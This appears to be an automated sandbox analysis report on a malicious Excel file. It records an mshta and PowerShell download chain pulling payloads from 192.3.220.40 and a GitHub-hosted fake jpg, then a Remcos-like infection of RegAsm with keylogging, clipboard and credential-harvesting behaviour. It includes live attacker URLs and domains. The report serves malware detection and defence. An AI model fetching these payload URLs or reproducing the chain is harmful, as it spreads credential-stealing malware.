                  Source: global trafficHTTP traffic detected: GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 14 Oct 2024 05:15:53 GMTConnection: Keep-AliveHost: 192.3.220.40If-None-Match: "28fda-62468ee52a080"
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B4AB5 URLDownloadToFileW,5_2_000007FE899B4AB5
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D50DAA.emfJump to behavior
                  Source: bhv8F64.tmp.24.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv8F64.tmp.24.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: jfm.com.co
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: idabo.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 0000000E.00000002.477794394.0000000002997000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000028A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/
                  Source: powershell.exe, 0000000E.00000002.477794394.0000000002997000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000028A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/RRFCCE.txt
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.485113430.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 0000001A.00000002.484892506.000000000036C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/sK
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 00000018.00000002.490099696.0000000000234000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428720236.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jfm.com.co/
                  Source: mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jfm.com.co/e
                  Source: 037002451082_10142024.xls, 7D330000.0.drString found in binary or memory: https://jfm.com.co/k3l?&alloy=handsome&c
                  Source: mshta.exe, 0000000F.00000002.478469673.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=oran
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000005.00000002.450249616.00000000022DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: powershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
                  Source: powershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgX
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.523357384.000000001A680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.525828262.000000001ABED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 00000018.00000002.493794174.0000000002688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49170 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000031_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041183A OpenClipboard,GetLastError,24_2_0041183A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,25_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,26_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,31_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,31_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,31_2_0040A41B
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

